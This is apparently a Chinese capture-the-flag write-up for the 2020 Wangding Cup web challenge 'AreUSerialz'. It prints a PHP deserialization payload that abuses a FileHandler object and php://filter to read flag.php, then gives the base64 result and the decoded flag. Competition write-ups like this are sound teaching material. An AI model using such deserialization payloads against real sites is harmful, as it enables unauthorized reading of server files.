【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/
进入网址
PHP反序列化漏洞…
拿到
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}
playload
直接在URL后面输入:
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}
之后会出现:
[Result]:
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==
复制
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==
去BASE64加密解密网址:
https://base64.supfree.net/
粘贴–>BASE64解密
解密内容为:
<?php$flag = "flag{cb426257-13d0-45ea-9301-c4c2011e3a77}";
flag{cb426257-13d0-45ea-9301-c4c2011e3a77}
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz相关推荐
- 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup
2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...
- 一起来参与安全知识小竞赛(2022第三届网鼎杯网络安全大赛——青龙组)
1:我国提出()算法首次被3GPP纳入国际标准,可以用于4/5G通讯解密 C A:SM2 B:SM3 C:ZUC D:SM9 2.人工智能研究的一项基本内 ...
- 2022第二届网刃杯网络安全大赛-Web
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...
- 第二届网刃杯网络安全大赛 Writeup
第二届网刃杯网络安全大赛 Writeup 前言 MISC 玩坏的XP * ISC ncsubj carefulguy easyiec xypo7 喜欢移动的黑客* LED_BOOM* 需要安全感* c ...
- 2022第二届网刃杯网络安全大赛-Re
2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...
- 2022第二届网刃杯网络安全大赛-ICS
2022第二届网刃杯网络安全大赛-ICS 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...
- 2020年第二届网鼎杯,青龙队伍题目,共十八道
1.题目选择界面 2.题目内容 最后附上题主保存的部分相关题目附件,有需要的可做参考. 题目附件综合 提取码:bad3 3.答案汇总,收集 来自吾爱破解Steven_David 签到+boom解题方案 ...
- 2022第二届网刃杯网络安全大赛
目录 前言 一.ICS1-ncsubj 二.ICS2-carefulguy 三.ICS3-喜欢移动的黑客 四.ICS4-easyiec 五.ICS5-xyp07
- 网鼎杯网络安全大赛玄武组_经典的一道CTF-WriteUP-SSRFME
刚完整复现一遍redis,然后重新打了一下这道题,SSRF+本地redis主从复制RCE组合拳拿shell 拿不到flag+反弹shell的惨案到此为止吧,跟我一步步拿shell,CTF-WriteU ...
最新文章
- Python正则表达式-2
- java 调 cmd 没反应
- 如何数分钟创建并成功运行数千台云主机?
- asp.net数据库连接web.config配置
- itext根据数据生成PDF
- 关于linux下的iptables 的浅析命令和了解
- Cisco NTP配置
- 谷歌VR展示360度全景图
- js json stringify
- 图像标注工具CVAT
- 内涵外延发生巨变的嵌入式技术,未来如何发展?
- R语言的graphics画图功能
- Krpano入门,导航栏,与javascript交互!!
- ECMAScript 6 字符串和数值的拓展
- Java以逗号分割字符串
- signature=2abb9e363faa3aa7323b2a3393a36011,Winhex软件的使用
- 有赞云开发小坑(个人笔记)
- python 爬虫-(2)认识爬虫
- mysql grant用法_十六、MySQL授权命令grant的使用方法
- 父类,子类中方法的调用